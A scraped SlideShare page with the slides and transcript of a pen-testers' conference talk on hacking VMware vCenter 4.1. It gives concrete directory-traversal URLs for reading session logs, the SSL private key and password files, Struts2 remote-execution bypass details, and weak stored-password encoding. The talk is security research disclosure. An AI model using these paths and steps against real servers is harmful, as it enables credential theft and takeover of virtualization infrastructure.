Your SlideShare is downloading. ×
0
How to hack VMware                  vCenter server in                        60 secondsAlexey SintsovAlexander Minozhenko
Hijacking VMware@asintsov @al3xmin• Pen-testers at DigitalSecurity• Researchers• DCG#7812 / Zeronights• FUN, FUN, FUN© 200...
Hijacking VMwareOur target© 2002—2012, Digital
Hijacking VMwareVMware vCenter Server    • VMware vCenter Server is solution to manage VMware vSphere    • vSphere – virtu...
Hijacking VMwarePen-test…• Vmware vCenter version 4.1 update 1Services:   • Update Manager   • vCenter Orchestrator   • Ch...
Hijacking VMwareVASTO and CVE-2009-1523• Directory traversal in Jetty web server  http://target:9084/vci/download/health.x...
Hijacking VMware8(© 2002—2012, Digital
Hijacking VMwareCVE-2010-1870• VMware vCenter Orchestrator use Struts2 version 2.11 discovered byDigital Defense, Inc• CVE...
Hijacking VMwareDetails    •Struts2 does not properly escape “#”    •Could be bypass with unicode “u0023”    •2 variables ...
Hijacking VMwareBut what about us?• Directory traversal in Jetty web server … AGAIN!http://target:9084/vci/download/.%5C.....
Hijacking VMwareAttack #1     • Read vpxd-profiler via traversal…     • Get Admin’s IP addresses from it…     • Read secre...
Hijacking VMwareVMware vCenter Orchestrator    • Vmware vCO – software for automate configuration    and management    • I...
Hijacking VMwareVMware vCenter OrchestratorPassword disclosure           Read hash -> crack MD5 -> log on into Orch. -> ge...
Hijacking VMwareVMware vCenter Orchestrator – more stuff• vCO stored password at files:• C:Program FilesVMwareInfrastructu...
Hijacking VMwareHmmm…. 006766e7964766a151e213a242665123568256c4031702d4c78454e5b575 f60654b         vmware 00776646771786a...
Hijacking VMware0day still not patched 8)© 2002—2012, Digital
Hijacking VMwaregg and bb                       a.sintsov@dsec.ru                       @asintsov                       a....
Upcoming SlideShare
Loading in...5
×

How to hack VMware vCenter server in 60 seconds

7,677

Published on

Published in: Technology
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
7,677
On Slideshare
0
From Embeds
0
Number of Embeds
1
Actions
Shares
0
Downloads
90
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Transcript of "How to hack VMware vCenter server in 60 seconds"

  1. 1. How to hack VMware vCenter server in 60 secondsAlexey SintsovAlexander Minozhenko
  2. 2. Hijacking VMware@asintsov @al3xmin• Pen-testers at DigitalSecurity• Researchers• DCG#7812 / Zeronights• FUN, FUN, FUN© 2002—2012, Digital
  3. 3. Hijacking VMwareOur target© 2002—2012, Digital
  4. 4. Hijacking VMwareVMware vCenter Server • VMware vCenter Server is solution to manage VMware vSphere • vSphere – virtualization operating system© 2002—2012, Digital
  5. 5. Hijacking VMwarePen-test…• Vmware vCenter version 4.1 update 1Services: • Update Manager • vCenter Orchestrator • Chargeback • Other• Most of those services has web server© 2002—2012, Digital
  6. 6. Hijacking VMwareVASTO and CVE-2009-1523• Directory traversal in Jetty web server http://target:9084/vci/download/health.xml/%3f/../../../../FILE• Discovered by Claudio Criscione• Fixed in VMware Update Manager 4.1 update 1 :( • Who want to pay me for 0day? • Pentester is not resercher?© 2002—2012, Digital
  7. 7. Hijacking VMware8(© 2002—2012, Digital
  8. 8. Hijacking VMwareCVE-2010-1870• VMware vCenter Orchestrator use Struts2 version 2.11 discovered byDigital Defense, Inc• CVE-2010-1870 Struts2/XWork remote command execution discoveredby Meder KydyralievFixed in 4.2© 2002—2012, Digital
  9. 9. Hijacking VMwareDetails •Struts2 does not properly escape “#” •Could be bypass with unicode “u0023” •2 variables need to be set for RCE •#_memberAccess[allowStaticMethodAccess] •#context[xwork.MethodAccessor.denyMethodExecution]© 2002—2012, Digital
  10. 10. Hijacking VMwareBut what about us?• Directory traversal in Jetty web server … AGAIN!http://target:9084/vci/download/.%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..FILE.EXT•Metasploit module vmware_update_manager_traversal.rb by sinn3r• We can read any file! But what Claudio Criscione propose to read vpxd-profiler-* - /SessionStats/SessionPool/Session/Id=06B90BCB-A0A4-4B9C-B680- FB72656A1DCB/Username=„FakeDomainFakeUser/SoapSession/Id=A Sorry, patched in 4.1! D45B176-63F3-4421-BBF0-FE1603E543F4/Count/total 1 Contains logs of SOAP requests with session ID !!! Discovered by Alexey Sintsov 8)© 2002—2012, Digital
  11. 11. Hijacking VMwareAttack #1 • Read vpxd-profiler via traversal… • Get Admin’s IP addresses from it… • Read secret SSL key http://target:9084/vci/downloads/...............Documents and SettingsAll UsersApplication DataVMwareVMware VirtualCenterSSLrui.key • ARP-SPOOF with SSL key - PROFIT© 2002—2012, Digital
  12. 12. Hijacking VMwareVMware vCenter Orchestrator • Vmware vCO – software for automate configuration and management • Install by default with vCenter • Have interesting file C:Program filesVMwareInfrastructureOrchestratorconfigurationj ettyetcpasswd.properties© 2002—2012, Digital
  13. 13. Hijacking VMwareVMware vCenter OrchestratorPassword disclosure Read hash -> crack MD5 -> log on into Orch. -> get vCenter pass© 2002—2012, Digital
  14. 14. Hijacking VMwareVMware vCenter Orchestrator – more stuff• vCO stored password at files:• C:Program FilesVMwareInfrastructureOrchestratorapp- <virtual-infrastructure-hostserverservervmoconfpluginsVC.xml <enabled>true</enabled>• C:Program FilesVMwareInfrastructureOrchestratorapp- <url>https://new-virtual-center-host:443/sdk</url> <administrator-username>vmware</administrator-username>serverservervmoconfvmo.properties <administrator- password>010506275767b74786b383a4a60be767864740329d5fcf 324ec7fc98b1e0aaeef </administrator-password> <pattern>%u</pattern> </virtual-infrastructure-host>© 2002—2012, Digital
  15. 15. Hijacking VMwareHmmm…. 006766e7964766a151e213a242665123568256c4031702d4c78454e5b575 f60654b vmware 00776646771786a783922145215445b62322d1a2b5d6e196a6a712d712e2 4726079 vcenter • Red bytes look like length • Green bytes in ASCII range • Black bytes random Discovered by Alexey Sintsov and Alexander Minozhenko© 2002—2012, Digital
  16. 16. Hijacking VMware0day still not patched 8)© 2002—2012, Digital
  17. 17. Hijacking VMwaregg and bb a.sintsov@dsec.ru @asintsov a.minozhenko@dsec.ru @al3xmin© 2002—2012, Digital
  1. A particular slide catching your eye?

    Clipping is a handy way to collect important slides you want to go back to later.

×